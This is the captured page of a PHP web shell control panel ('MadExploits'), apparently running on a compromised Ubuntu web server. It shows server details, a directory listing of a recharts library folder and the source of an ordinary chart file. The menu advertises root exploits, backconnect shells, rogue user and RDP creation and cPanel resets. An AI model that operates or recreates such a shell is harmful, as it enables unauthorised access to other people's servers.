Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
recharts /
es6 /
chart /
[ HOME SHELL ]
Name
Size
Permission
Action
AccessibilityManager.js
5.79
KB
-rw-r--r--
AreaChart.js
547
B
-rw-r--r--
BarChart.js
623
B
-rw-r--r--
ComposedChart.js
805
B
-rw-r--r--
FunnelChart.js
405
B
-rw-r--r--
LineChart.js
547
B
-rw-r--r--
PieChart.js
851
B
-rw-r--r--
RadarChart.js
762
B
-rw-r--r--
RadialBarChart.js
894
B
-rw-r--r--
Sankey.js
26.76
KB
-rw-r--r--
ScatterChart.js
733
B
-rw-r--r--
SunburstChart.js
9.06
KB
-rw-r--r--
Treemap.js
27.23
KB
-rw-r--r--
generateCategoricalChart.js
95.45
KB
-rw-r--r--
types.js
10
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ScatterChart.js
/** * @fileOverview Scatter Chart */ import { generateCategoricalChart } from './generateCategoricalChart'; import { Scatter } from '../cartesian/Scatter'; import { XAxis } from '../cartesian/XAxis'; import { YAxis } from '../cartesian/YAxis'; import { ZAxis } from '../cartesian/ZAxis'; import { formatAxisMap } from '../util/CartesianUtils'; export var ScatterChart = generateCategoricalChart({ chartName: 'ScatterChart', GraphicalChild: Scatter, defaultTooltipEventType: 'item', validateTooltipEventTypes: ['item'], axisComponents: [{ axisType: 'xAxis', AxisComp: XAxis }, { axisType: 'yAxis', AxisComp: YAxis }, { axisType: 'zAxis', AxisComp: ZAxis }], formatAxisMap: formatAxisMap });
Close